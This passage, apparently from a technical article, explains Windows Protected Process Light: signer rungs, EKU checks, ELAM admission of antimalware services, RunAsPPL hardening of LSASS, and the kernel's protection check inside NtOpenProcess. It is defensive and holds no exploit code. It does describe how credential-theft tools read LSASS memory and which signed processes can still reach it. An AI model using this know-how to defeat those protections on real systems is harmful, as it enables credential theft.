&lt;th&gt;WinTcb (6)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;None (admin, integrity SYSTEM)&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;denied&lt;/td&gt;
&lt;td&gt;denied&lt;/td&gt;
&lt;td&gt;denied&lt;/td&gt;
&lt;td&gt;denied&lt;/td&gt;
&lt;td&gt;denied&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PPL/Authenticode (1)&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;denied&lt;/td&gt;
&lt;td&gt;denied&lt;/td&gt;
&lt;td&gt;denied&lt;/td&gt;
&lt;td&gt;denied&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PPL/Antimalware (3)&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;denied&lt;/td&gt;
&lt;td&gt;denied&lt;/td&gt;
&lt;td&gt;denied&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PPL/Lsa (4)&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;denied&lt;/td&gt;
&lt;td&gt;denied&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PPL/Windows (5)&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;denied&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PPL/WinTcb (6)&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;td&gt;full&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Where &quot;denied&quot; means the &lt;em&gt;full&lt;/em&gt; mask is rejected; the limited mask continues to apply per the target&apos;s security descriptor.&lt;/p&gt;

flowchart BT
    None[None / unprotected]
    Auth[Authenticode]
    CG[CodeGen]
    AM[Antimalware]
    Lsa[Lsa]
    Win[Windows]
    Tcb[WinTcb]
    None --&amp;gt; Auth
    Auth --&amp;gt; CG
    CG --&amp;gt; AM
    AM --&amp;gt; Lsa
    Lsa --&amp;gt; Win
    Win --&amp;gt; Tcb
&lt;p&gt;The Enhanced Key Usage side of the design holds the lattice together. Microsoft&apos;s EKU OID arc &lt;code&gt;1.3.6.1.4.1.311.10.3.*&lt;/code&gt; defines sub-OIDs per signer rung [@iana-pen311] [@oid-base-eku-arc], and at process creation the kernel parses the main image&apos;s Authenticode signature and walks its EKU extensions to determine which rung the binary is entitled to claim. If the certificate chain resolves cleanly to a Microsoft-issued root &lt;em&gt;and&lt;/em&gt; carries the rung&apos;s sub-OID, the kernel records the rung. Otherwise the process either starts unprotected or refuses to start at all.&lt;/p&gt;

An X.509 v3 certificate extension that asserts what specific purposes a certificate is allowed to certify. Microsoft uses sub-OIDs under `1.3.6.1.4.1.311.10.3.*` to encode protected-process signer rungs as EKU values [@iana-pen311] [@oid-base-eku-arc]. The kernel checks the EKU at process creation; the certificate chain anchors which Microsoft-issued sub-CA may issue at each rung.The IANA Private Enterprise Number `311` is registered to Microsoft under the PEN prefix `1.3.6.1.4.1.` [@iana-pen311], so `1.3.6.1.4.1.311.*` is the catch-all namespace for Microsoft-specific X.509 extensions; the `10.3.*` arc within it is the Microsoft Enhanced Key Usage (purpose) sub-tree [@oid-base-eku-arc], and `10.3.` slots map to specific signer purposes including protected-process rungs.
&lt;p&gt;The most important property of this design is the resolution point. The kernel parses the EKU exactly once, at &lt;code&gt;NtCreateUserProcess&lt;/code&gt;. It stores the resulting rung in &lt;code&gt;EPROCESS.Protection&lt;/code&gt;. On every subsequent &lt;code&gt;OpenProcess&lt;/code&gt; against that process, the kernel consults the byte, not the certificate. This makes the access check fast (one byte load, one byte compare) and decouples policy at runtime from policy at signing time. It also creates the structural seam that every public bypass since 2018 has exploited, because the kernel&apos;s confidence in the byte is exactly the confidence it had in the certificate at process-create time, projected forward indefinitely.&lt;/p&gt;
&lt;p&gt;Ionescu&apos;s Part 2 names the implementation directly. The lattice is not code; it is a data table named &lt;code&gt;RtlProtectedAccess[]&lt;/code&gt; baked into &lt;code&gt;ntoskrnl.exe&lt;/code&gt; [@ionescu-part2]. Each row of that table corresponds to a (signer, target-type) pair and encodes which access bits are allowed in the full mask. The relevant runtime routines are &lt;code&gt;PspProcessOpen&lt;/code&gt; and &lt;code&gt;PspThreadOpen&lt;/code&gt; (the object-manager open callbacks), &lt;code&gt;PspCheckForInvalidAccessByProtection&lt;/code&gt; (which performs the check), &lt;code&gt;RtlTestProtectedAccess&lt;/code&gt; (which applies the lattice row), and &lt;code&gt;RtlValidProtectionLevel&lt;/code&gt; (which sanity-checks the encoded byte for consistency).&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The decision of who can touch whom is encoded in a table inside &lt;code&gt;ntoskrnl.exe&lt;/code&gt;. Changing the lattice means changing a table; widening or narrowing it does not require new code. This is why Microsoft can add &lt;code&gt;App = 8&lt;/code&gt; to the enumeration over time without touching the access-check routine.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Note one symmetry that becomes important later. &quot;Greater or equal&quot; means that within a rung, every PPL can read every other PPL. Two co-resident &lt;code&gt;PPL/Antimalware&lt;/code&gt; daemons -- Microsoft Defender&apos;s &lt;code&gt;MsMpEng.exe&lt;/code&gt; and a third-party EDR&apos;s agent -- can call &lt;code&gt;PROCESS_VM_READ&lt;/code&gt; on each other. Within-rung peers leak to each other by design. The lattice prevents &lt;em&gt;escalation&lt;/em&gt;, not &lt;em&gt;peer access&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;The lattice settles the rule. The next question is admission: who decides which binaries are allowed to claim the Antimalware rung, and how does Microsoft admit third-party code into it at all? The answer is a driver.&lt;/p&gt;
&lt;h2&gt;5. The Antimalware Rung -- ELAM and Third-Party Code at PPL&lt;/h2&gt;
&lt;p&gt;PPL is interesting only if it admits non-Microsoft code at &lt;em&gt;some&lt;/em&gt; rung. The Vista PP design admitted nobody; it required a Microsoft PMP root certificate, full stop. PPL inherited that constraint at every rung except one. The Antimalware rung -- signer value &lt;code&gt;3&lt;/code&gt; -- is the only rung where third-party vendors can ship their own user-mode binaries as protected processes. The admission mechanism is the Early Launch Anti-Malware driver.&lt;/p&gt;

A specially signed Microsoft-certified kernel driver shipped by an anti-malware vendor that loads before any other boot-start driver. The ELAM driver participates in trusted-boot measurement, vouches for follow-on drivers, and -- critical to PPL -- carries an embedded resource section enumerating the vendor&apos;s user-mode signing certificate hashes. The kernel uses that resource section to admit the vendor&apos;s user-mode daemon binaries to `PPL/Antimalware` at service start.
&lt;p&gt;Microsoft Learn&apos;s &quot;Protecting Anti-Malware Services&quot; page describes the boot-time admission flow in two sentences [@learn-am-services]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The driver must have an embedded resource section containing the information of the certificates used to sign the user mode service binaries. During the boot process, this resource section will be extracted from the ELAM driver to validate the certificate information and register the anti-malware service.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Two consequences. First, the third-party signer set is bounded by a &lt;em&gt;kernel-readable resource section&lt;/em&gt;, not by an open EKU. Microsoft, not the vendor, controls which user-mode binaries are admissible. Second, the signing-certificate information is baked into the driver at signing time and re-validated at every service start. A vendor cannot widen the admissible signing-certificate set after the fact; an attacker cannot admit their own user-mode binary unless it is signed by a certificate already registered in the driver&apos;s resource section and it satisfies the protected-service code-integrity policy.&lt;/p&gt;
&lt;p&gt;The gate that decides which vendors get ELAM drivers in the first place is the Microsoft Virus Initiative. Microsoft Learn&apos;s MVI criteria page enumerates the requirement explicitly [@learn-mvi]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Your security solution must be certified within the last 12 months by at least one of the organizations listed below: AV-Comparatives, AVLab Cybersecurity Foundation, AV-Test, MRG Effitas, SE Labs, SKD Labs, VB 100, West Coast Labs.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The same page requires &quot;use of Trusted Signing,&quot; Microsoft&apos;s cloud-managed code signing service. The implications are operational. To ship code at &lt;code&gt;PPL/Antimalware&lt;/code&gt;, a vendor must (a) hold MVI membership, (b) maintain independent-lab certification, (c) author an ELAM driver, (d) get the driver through Microsoft WHQL and have it Microsoft co-signed, and (e) embed the user-mode certificate hashes in the driver&apos;s resource section.&lt;/p&gt;

A Microsoft program for anti-malware vendors that gates access to ELAM driver signing and to specific Defender APIs. Membership requires independent-lab certification (renewed annually) and Trusted Signing usage; in practical terms, MVI membership is the entry ticket to deploying user-mode binaries at `PPL/Antimalware`.

The implication of MVI is that an indie security tool, however technically sound, cannot deploy as `PPL/Antimalware`. The gate is not technical but commercial: independent-lab certification fees, annual renewals, and the engineering investment of building a production-grade ELAM driver. The signer rung is *signed*; the signing program is *gated*.

sequenceDiagram
    participant BM as Boot manager
    participant K as Windows kernel
    participant ELAM as Vendor ELAM driver (.sys)
    participant SCM as Service Control Manager
    participant CI as ci.dll (CodeIntegrity)
    participant Svc as Vendor service (e.g. EDR daemon)
    BM-&amp;gt;&amp;gt;K: load boot drivers
    K-&amp;gt;&amp;gt;ELAM: load ELAM driver early
    K-&amp;gt;&amp;gt;ELAM: read embedded ELAM resource section
    K-&amp;gt;&amp;gt;K: cache vendor user-mode cert hashes
    Note over K,SCM: Boot continues, OS initialises
    SCM-&amp;gt;&amp;gt;Svc: start vendor service
    Svc-&amp;gt;&amp;gt;CI: validate service binary signature
    CI-&amp;gt;&amp;gt;K: lookup vendor cert against cached hashes
    K--&amp;gt;&amp;gt;CI: match -- admit at PPL/Antimalware
    CI--&amp;gt;&amp;gt;Svc: launch as PPL/Antimalware (Protection = 0x31)
&lt;p&gt;By 2024, every major commercial EDR ships through this path. Microsoft Defender&apos;s &lt;code&gt;MsMpEng.exe&lt;/code&gt; uses the inbox &lt;code&gt;WdBoot.sys&lt;/code&gt; ELAM driver&lt;code&gt;WdBoot.sys&lt;/code&gt; (&quot;Windows Defender Boot Driver&quot;) is Microsoft&apos;s inbox first-party ELAM driver; it ships in every Windows install and is loaded before any third-party ELAM driver. The canonical reference implementation of the ELAM resource-section pattern is Microsoft&apos;s &lt;code&gt;Windows-driver-samples/security/elam&lt;/code&gt; repository [@ms-elam-sample], which also documents the Early Launch EKU &lt;code&gt;1.3.6.1.4.1.311.61.4.1&lt;/code&gt; verbatim.. Third-party members of Microsoft&apos;s Virus Initiative -- the cohort gated by the MVI criteria quoted above [@learn-mvi] -- ship their own vendor ELAM drivers and run their main user-mode daemons at &lt;code&gt;PPL/Antimalware&lt;/code&gt;. Microsoft Learn&apos;s &quot;Early Launch Antimalware&quot; page is the canonical confirmation [@learn-elam]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Because an ELAM service runs as a PPL (Protected Process Light), you need to debug using a kernel debugger.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;One Microsoft-signed sentence and a billion endpoints. EDR vendors get protection against administrator-level tampering for free, on top of the kernel telemetry their drivers already collect. Microsoft gets a viable third-party security market without widening the EKU gates beyond a controllable set of vendors.&lt;/p&gt;
&lt;p&gt;ELAM admits the &lt;em&gt;daemon&lt;/em&gt;. The next operational question is what Microsoft does for &lt;code&gt;lsass.exe&lt;/code&gt; itself -- the canonical credential store, the original Mimikatz target. The mechanism is called &lt;code&gt;RunAsPPL&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;6. RunAsPPL -- Hardening LSASS&lt;/h2&gt;
&lt;p&gt;The registry value that produced the Mimikatz failure in Section 1 is a single DWORD. itm4n&apos;s walkthrough names it verbatim [@itm4n-runasppl]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Open the key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa&lt;/code&gt;; add the DWORD value &lt;code&gt;RunAsPPL&lt;/code&gt; and set it to 1; reboot.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;After reboot, &lt;code&gt;lsass.exe&lt;/code&gt; launches at &lt;code&gt;PPL/Lsa&lt;/code&gt;, signer rung 4, protection byte &lt;code&gt;0x41&lt;/code&gt;. Mimikatz running with full SYSTEM-integrity and &lt;code&gt;SeDebugPrivilege&lt;/code&gt; then receives &lt;code&gt;0x00000005&lt;/code&gt; on &lt;code&gt;OpenProcess(PROCESS_VM_READ, lsass.exe)&lt;/code&gt;. The registry knob is one DWORD; the consequences are large.&lt;/p&gt;

The Windows user-mode process that holds NTLM password hashes, Kerberos Ticket Granting Tickets, MSV1_0 credential caches, DPAPI master keys, and (on legacy builds before Microsoft&apos;s 2014 KB2871997 update [@ms-kb2871997]) WDigest plaintext passwords. The canonical target of credential-theft tooling since 2011.
&lt;p&gt;The threat being mitigated is simple. Mimikatz reads LSASS memory via &lt;code&gt;OpenProcess(PROCESS_VM_READ, lsass.exe)&lt;/code&gt;, walks the internal key-store structures, and extracts NTLM hashes, Kerberos session keys, and (on older configurations) cached plaintext. Restricting &lt;code&gt;SeDebugPrivilege&lt;/code&gt; does not work, because an attacker with SYSTEM has every privilege. Restricting the security descriptor on &lt;code&gt;lsass.exe&lt;/code&gt; does not work either, because legitimate services need to interact with it. PPL is the right primitive: it gates the &lt;em&gt;full&lt;/em&gt; mask irrespective of token state, and the kernel admits only Microsoft-signed code into the &lt;code&gt;Lsa&lt;/code&gt; rung.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;RunAsPPL = 1&lt;/code&gt; is the stronger form of the setting on Secure Boot-capable machines. On the next boot, the kernel automatically mirrors the policy into a Secure Boot-anchored UEFI variable; once set, the protection survives registry rollback. An attacker who removes the registry key finds that LSASS still launches as PPL on the next boot. The only path to remove the protection is to disable Secure Boot at the firmware level, which requires physical access and which trips other defences. Microsoft Learn&apos;s documentation describes it verbatim [@learn-runasppl]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You can achieve further protection when you use Unified Extensible Firmware Interface (UEFI) lock and Secure Boot. When these settings are enabled, disabling the &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa&lt;/code&gt; registry key has no effect.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is &lt;code&gt;RunAsPPL = 1&lt;/code&gt;. For environments that need admin-removable protection without the UEFI lock, &lt;code&gt;RunAsPPL = 2&lt;/code&gt; (available on Win11 22H2 and later) omits the UEFI variable. The policy lives in the registry only and is removable by any administrator (or by malware running as administrator) who simply deletes the registry value before reboot.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;code&gt;RunAsPPL&lt;/code&gt; value&lt;/th&gt;
&lt;th&gt;Behaviour&lt;/th&gt;
&lt;th&gt;Removable by?&lt;/th&gt;
&lt;th&gt;Persistence&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;0&lt;/code&gt; (or absent)&lt;/td&gt;
&lt;td&gt;LSASS runs unprotected&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;1&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;LSASS runs as PPL/Lsa; policy mirrored to UEFI variable on Secure Boot machines&lt;/td&gt;
&lt;td&gt;Physical access + Secure Boot disable&lt;/td&gt;
&lt;td&gt;Firmware-anchored&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;2&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;LSASS runs as PPL/Lsa; registry only (Win11 22H2+ only)&lt;/td&gt;
&lt;td&gt;Any admin who deletes the key&lt;/td&gt;
&lt;td&gt;Registry only&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The &lt;code&gt;RunAsPPL = 1&lt;/code&gt; setting is the practical answer to &quot;what stops an attacker who is willing to reboot?&quot; Once the UEFI variable is set, neither registry rollback nor PE-based offline attacks on the registry hive can disable LSA protection on the next boot.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The deployment cost of &lt;code&gt;RunAsPPL&lt;/code&gt; is compatibility with third-party authentication modules. LSASS hosts a set of plug-ins: smart-card middleware, third-party Cryptographic Service Providers (CSPs), password-filter DLLs, alternative authentication packages. Under &lt;code&gt;RunAsPPL&lt;/code&gt;, the kernel demands that every DLL loaded into LSASS carry a Microsoft signature with the appropriate EKU. The enforcement comes from LSASS&apos;s section signing-level (the &lt;code&gt;SectionSignatureLevel&lt;/code&gt; from the earlier decode), not from the process Signer rung. Vendor DLLs that lack the right EKU are rejected at section creation. The rejections surface as CodeIntegrity events in the system event log. Microsoft Learn enumerates the two relevant event IDs [@learn-runasppl]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Event 3065 occurs when a code integrity check determines that a process, usually LSASS.exe, attempts to load a driver that doesn&apos;t meet the security requirements for shared sections.&lt;/p&gt;
&lt;p&gt;Event 3066 occurs when a code integrity check determines that a process, usually LSASS.exe, attempts to load a driver that doesn&apos;t meet the Microsoft signing level requirements.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is why Microsoft recommends running the setting in &lt;em&gt;audit mode&lt;/em&gt; before enforcement. Audit mode is enabled by setting a separate &lt;code&gt;AuditLevel&lt;/code&gt; DWORD to &lt;code&gt;8&lt;/code&gt;, but -- critically -- under a &lt;em&gt;different&lt;/em&gt; registry key from the one that hosts &lt;code&gt;RunAsPPL&lt;/code&gt;. Microsoft Learn places &lt;code&gt;AuditLevel&lt;/code&gt; under the Image File Execution Options hive for &lt;code&gt;LSASS.exe&lt;/code&gt; and names the path verbatim [@learn-runasppl]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Open the Registry Editor, or enter RegEdit.exe in the Run dialog, and then go to the &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; registry key. Open the &lt;code&gt;AuditLevel&lt;/code&gt; value. Set its data type to &lt;code&gt;dword&lt;/code&gt; and its data value to &lt;code&gt;00000008&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;code&gt;RunAsPPL&lt;/code&gt; sits under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa&lt;/code&gt;. &lt;code&gt;AuditLevel = 8&lt;/code&gt; sits under &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt;. A defender who edits &quot;the same key&quot; silently sets the wrong value and audit mode never engages. The deployment looks correct from the registry; the log surface is empty; the rollout breaks production on enforcement day. Two values. Two hives. Read this twice.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;In audit mode, the kernel emits the same 3065 / 3066 events for would-be load rejections but allows the loads to proceed. Two months of audit-mode telemetry typically surfaces every smart-card middleware DLL, every password-filter, every third-party CSP on a corporate fleet. Once the audit log is clean (every vendor&apos;s modules have been re-signed at the LSA level or replaced), enforcement mode can be turned on without breaking production logins.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Skipping audit mode is the most common cause of LSA protection rollouts being rolled back after a wave of authentication failures. See §11 Item 1 for the full audit-then-enforce-then-UEFI-lock recipe.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The deployment cadence has been deliberately glacial. &lt;code&gt;RunAsPPL&lt;/code&gt; shipped in Windows 8.1 in October 2013 -- &lt;em&gt;opt-in&lt;/em&gt;. It remained opt-in for nine years. Microsoft Learn records the inflection [@learn-runasppl]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Audit mode for added LSA protection is enabled by default on devices running Windows 11 version 22H2 and later.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Audit mode default-on. Not enforcement. The Windows 11 24H2 release expanded the audit-mode rollout further. Eleven years from opt-in to effective default. The pace reflects the compatibility risk: every domain with a single non-Microsoft-signed LSASS plug-in would have surfaced as a support call.&lt;/p&gt;
&lt;p&gt;The registry knob is simple. The &lt;em&gt;kernel&lt;/em&gt; check that enforces it is not. The next section walks the access-check pipeline in detail, because the structural reason &lt;code&gt;SeDebugPrivilege&lt;/code&gt; cannot help an attacker is the order in which the kernel asks its questions.&lt;/p&gt;
&lt;h2&gt;7. The Kernel Access Check -- What Happens Inside &lt;code&gt;NtOpenProcess&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;Recall the trace from Section 1. The denial happens before &lt;code&gt;SeAccessCheck&lt;/code&gt; runs. The reason &lt;code&gt;SeDebugPrivilege&lt;/code&gt; does not help is not that the kernel decided to override the privilege; it is that the kernel never asked about the privilege. The order matters. Let us walk it.&lt;/p&gt;
&lt;p&gt;The Win32 caller invokes &lt;code&gt;OpenProcess&lt;/code&gt;, which thunks through &lt;code&gt;kernel32.dll&lt;/code&gt; to the syscall &lt;code&gt;NtOpenProcess&lt;/code&gt;. &lt;code&gt;NtOpenProcess&lt;/code&gt; does its handle-lookup and dispatches to the process-type object-manager open callback, &lt;code&gt;PspProcessOpen&lt;/code&gt;. Ionescu&apos;s Part 2 names the path verbatim [@ionescu-part2]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Access to protected processes (and their threads) is gated by the &lt;code&gt;PspProcessOpen&lt;/code&gt; and &lt;code&gt;PspThreadOpen&lt;/code&gt; object manager callback routines, which perform two checks. The first, done by calling &lt;code&gt;PspCheckForInvalidAccessByProtection&lt;/code&gt; (which in turn calls &lt;code&gt;RtlTestProtectedAccess&lt;/code&gt; and &lt;code&gt;RtlValidProtectionLevel&lt;/code&gt;) ...&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;code&gt;PspCheckForInvalidAccessByProtection&lt;/code&gt; does two things. First, it splits the caller&apos;s requested access mask into two subsets:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;strong&gt;limited mask&lt;/strong&gt; -- a fixed set of bits (&lt;code&gt;SYNCHRONIZE&lt;/code&gt;, &lt;code&gt;PROCESS_QUERY_LIMITED_INFORMATION&lt;/code&gt;, and a small handful of others) that the lattice never forbids. The limited mask is subject only to the standard &lt;code&gt;SeAccessCheck&lt;/code&gt; against the target&apos;s DACL.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;full mask&lt;/strong&gt; -- everything else, including &lt;code&gt;PROCESS_VM_READ&lt;/code&gt;, &lt;code&gt;PROCESS_VM_WRITE&lt;/code&gt;, &lt;code&gt;PROCESS_CREATE_THREAD&lt;/code&gt;, &lt;code&gt;PROCESS_DUP_HANDLE&lt;/code&gt;, and &lt;code&gt;PROCESS_ALL_ACCESS&lt;/code&gt;. The full mask is subject to the lattice rule.&lt;/li&gt;
&lt;/ul&gt;

The subset of `PROCESS_*` access rights that the PPL lattice always allows the standard `SeAccessCheck` to evaluate. Includes `SYNCHRONIZE`, `PROCESS_QUERY_LIMITED_INFORMATION`, `PROCESS_SET_LIMITED_INFORMATION`, and `PROCESS_SUSPEND_RESUME`. `PROCESS_TERMINATE` is included for callers below the Antimalware tier (deny mask `0xFC7FE`), but the kernel widens the deny mask to `0xFC7FF` at the `Antimalware`, `Lsa`, and `WinTcb` rungs -- bit 0, `PROCESS_TERMINATE` -- making those three rungs unkillable except from peers or higher.
&lt;p&gt;Second, it indexes into &lt;code&gt;RtlProtectedAccess[]&lt;/code&gt; using the caller&apos;s signer rung and the target&apos;s type, retrieves the row of permissible access bits, and ANDs the row with the full mask. If the result is non-empty, the access proceeds; if the result is zero, the kernel strips the full-mask bits from the request and returns either the limited subset (if the caller asked for any limited bits) or &lt;code&gt;STATUS_ACCESS_DENIED&lt;/code&gt;. &lt;code&gt;RtlValidProtectionLevel&lt;/code&gt; runs alongside as a sanity check on the encoded byte to catch malformed &lt;code&gt;EPROCESS.Protection&lt;/code&gt; values that would otherwise let the lattice walk off the end of the table.&lt;/p&gt;

sequenceDiagram
    participant App as Caller (any token)
    participant Nt as NtOpenProcess
    participant PsPO as PspProcessOpen
    participant Chk as PspCheckForInvalidAccessByProtection
    participant Rtl as RtlTestProtectedAccess + RtlValidProtectionLevel
    participant Tab as RtlProtectedAccess[] table
    participant SAC as SeAccessCheck
    App-&amp;gt;&amp;gt;Nt: NtOpenProcess(DesiredAccess)
    Nt-&amp;gt;&amp;gt;PsPO: dispatch
    PsPO-&amp;gt;&amp;gt;Chk: protection check
    Chk-&amp;gt;&amp;gt;Rtl: lookup caller / target rungs
    Rtl-&amp;gt;&amp;gt;Tab: index row, retrieve allowed bits
    Tab--&amp;gt;&amp;gt;Rtl: row of allowed access bits
    Rtl--&amp;gt;&amp;gt;Chk: full mask allowed or stripped
    Chk--&amp;gt;&amp;gt;PsPO: residual mask (full or limited)
    PsPO-&amp;gt;&amp;gt;SAC: residual mask vs DACL + token
    SAC--&amp;gt;&amp;gt;Nt: final mask
    Nt--&amp;gt;&amp;gt;App: handle or STATUS_ACCESS_DENIED
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The protection check runs &lt;em&gt;before&lt;/em&gt; &lt;code&gt;SeAccessCheck&lt;/code&gt;. Privileges are evaluated by &lt;code&gt;SeAccessCheck&lt;/code&gt;. The reason &lt;code&gt;SeDebugPrivilege&lt;/code&gt; does not help is structural -- it is not consulted at the moment of denial.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Four worked traces make this concrete.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Case (a): admin -&amp;gt; lsass with &lt;code&gt;PROCESS_ALL_ACCESS&lt;/code&gt;.&lt;/strong&gt; The caller has no &lt;code&gt;EPROCESS.Protection.Type&lt;/code&gt; (it is &lt;code&gt;None&lt;/code&gt;). The target is &lt;code&gt;PPL/Lsa&lt;/code&gt;. The lattice forbids the full mask. The kernel strips every bit of &lt;code&gt;PROCESS_ALL_ACCESS&lt;/code&gt; except the limited subset. The caller wanted to write memory; the limited subset cannot write memory; the operation effectively fails. This is the Mimikatz scenario.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Case (b): admin -&amp;gt; lsass with &lt;code&gt;PROCESS_QUERY_LIMITED_INFORMATION&lt;/code&gt;.&lt;/strong&gt; Same caller, same target, but the requested mask sits entirely in the limited subset. The lattice does not gate the limited mask. &lt;code&gt;SeAccessCheck&lt;/code&gt; evaluates the DACL on &lt;code&gt;lsass.exe&lt;/code&gt;, finds that administrators are permitted to query basic process information, and the call succeeds. This is why Process Explorer can still enumerate &lt;code&gt;lsass.exe&lt;/code&gt; and show its threads even when LSA protection is enabled.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Case (c): &lt;code&gt;MsMpEng.exe&lt;/code&gt; (PPL/Antimalware, rung 3) -&amp;gt; &lt;code&gt;lsass.exe&lt;/code&gt; (PPL/Lsa, rung 4) with &lt;code&gt;PROCESS_VM_READ&lt;/code&gt;.&lt;/strong&gt; The lattice rule: caller rung 3 &amp;lt; target rung 4, so the full mask is denied. Defender cannot read LSASS memory. Defender does not need to; the cross-rung isolation prevents one Microsoft service from reading another Microsoft service&apos;s secrets even within the same trusted system.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Case (d): hypothetical &lt;code&gt;PPL/WinTcb&lt;/code&gt; (rung 6) -&amp;gt; &lt;code&gt;lsass.exe&lt;/code&gt; (PPL/Lsa, rung 4) with &lt;code&gt;PROCESS_VM_READ&lt;/code&gt;.&lt;/strong&gt; The lattice rule: caller rung 6 &amp;gt;= target rung 4, so the full mask is allowed. A process signed at the WinTcb rung can read LSASS memory by design. This is how &lt;code&gt;WerFaultSecure.exe&lt;/code&gt;, the WinTcb-signed Windows Error Reporting dumper, can still read protected &lt;code&gt;lsass.exe&lt;/code&gt; to produce a crash dump.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Caller&lt;/th&gt;
&lt;th&gt;Target&lt;/th&gt;
&lt;th&gt;Mask&lt;/th&gt;
&lt;th&gt;Lattice rule&lt;/th&gt;
&lt;th&gt;Outcome&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Admin, no Protection&lt;/td&gt;
&lt;td&gt;PPL/Lsa&lt;/td&gt;
&lt;td&gt;PROCESS_ALL_ACCESS&lt;/td&gt;
&lt;td&gt;Caller has no rung&lt;/td&gt;
&lt;td&gt;Full mask stripped (denied)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Admin, no Protection&lt;/td&gt;
&lt;td&gt;PPL/Lsa&lt;/td&gt;
